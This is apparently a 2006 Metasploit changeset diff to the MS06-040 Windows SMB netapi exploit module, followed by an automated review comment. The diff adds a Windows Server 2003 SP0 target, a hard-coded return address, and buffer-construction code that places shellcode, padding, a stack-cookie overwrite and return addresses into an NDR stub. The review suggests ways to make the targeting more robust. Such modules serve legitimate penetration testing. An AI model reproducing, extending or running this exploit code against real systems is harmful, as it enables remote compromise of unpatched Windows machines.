Changeset 4023
- Timestamp:
- 10/15/06 02:54:58 (2 years ago)
- Files:
-
- framework2/trunk/exploits/netapi_ms06_040.pm (modified) (5 diffs)
framework2/trunk/exploits/netapi_ms06_040.pm
r4006 r4023 27 27 [ 28 28 'H D Moore <hdm [at] metasploit.com>', 29 'Trirat Puttaraksa <trir00t [at] gmail.com>', 29 30 ], 30 31 … … 66 67 will likely result in a complete reboot on Windows 2000 and the termination of all 67 68 SMB-related services on Windows XP. The default target for this exploit should succeed 68 on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1. 69 on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1. The exploit also 70 work on Windows Server 2003 SP0. However, the service will crash sometime after 71 the exploitation. 72 69 73 } 70 74 ), … … 80 84 'Targets' => 81 85 [ 82 [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1 )' ],86 [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1, 2003 SP0)' ], 83 87 [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ], 84 88 [ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ], 85 89 [ '(stack) Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll 86 90 [ '(stack) Windows XP SP1 Italian', 656, 680, 0x71a37bfb], # jmp esp @ ws2_32.dll (thanks diaul!) 91 [ '(wcscpy) Windows Server 2003 SP0', 612, 0x71c8c1ec], 87 92 ], 88 93 … … 161 166 } 162 167 elsif ( $smb->PeerNativeOS =~ m/Windows Server 2003 (\d+)$/ ) { 168 $target = $self->Targets->[5]; 163 169 $self->PrintLine("[*] Detected a Windows 2003 (Build $1 - No Service Pack) target"); 164 $self->PrintLine("[*] This system is not yet supported.");165 return;166 170 } 167 171 elsif ( $smb->PeerNativeOS =~ m/Windows Server 2003 (\d+) Service Pack (\d+)/ ) { … … 272 276 Pex::NDR::Long(int(rand(250)+1)). 273 277 Pex::NDR::Long(0); 274 } else { 278 279 # 280 # Use wcscpy() method with cookie overwrite on Windows Server 2003 SP0 281 # 282 } elsif ($target->[0] =~ /2003/) { 283 284 my $path = 285 286 $shellcode . 287 # padding 288 Pex::Text::AlphaNumText($target->[1] - length($shellcode)). 289 Pex::Text::AlphaNumText(32). 290 # cookie 291 substr($shellcode, 0, 4). 292 Pex::Text::AlphaNumText(4). 
293 # return address 294 pack('V', $target->[2]). 295 Pex::Text::AlphaNumText(8). 296 pack('V', $target->[2]). 297 pack('V', $target->[2]). 298 Pex::Text::AlphaNumText(36). 299 # terminate 300 "\x00\x00"; 301 302 # Packet that into a stub 303 $stub = 304 Pex::NDR::Long(int(rand(0xffffffff))). 305 Pex::NDR::UnicodeConformantVaryingString(''). 306 Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path). 307 Pex::NDR::Long(int(rand(250)+1)). 308 Pex::NDR::UnicodeConformantVaryingString(''). 309 Pex::NDR::Long(int(rand(250)+1)). 310 Pex::NDR::Long(0); 311 312 }else { 275 313 $self->PrintLine("This target is not currently supported"); 276 314 return;
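Review bot: The new branch at new line 282 selects the Server 2003 path by matching `/2003/` against the target's display name, while the same commit also adds the text "2003 SP0" to the Automatic target's name on line 86, so a code-path decision is now coupled to a substring of two human-readable strings; if the automatic entry ever reaches this comparison unresolved, `$target->[1]` and `$target->[2]` are undefined and the arithmetic and `pack('V', ...)` calls operate on undef. Anchoring on the full name, `} elsif ($target->[0] =~ /Windows Server 2003/) {`, or guarding with `defined $target->[2]`, keeps the display text free to change; whether an earlier branch already consumes the Automatic target is not visible in this hunk. The hard-coded `$self->Targets->[5]` on new line 168 has the same fragility and will silently pick a different entry if the Targets table is reordered. The description text added on lines 69–70 reads "The exploit also work on" and should read "also works on". The enclosing subroutine starts and ends outside the hunk.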
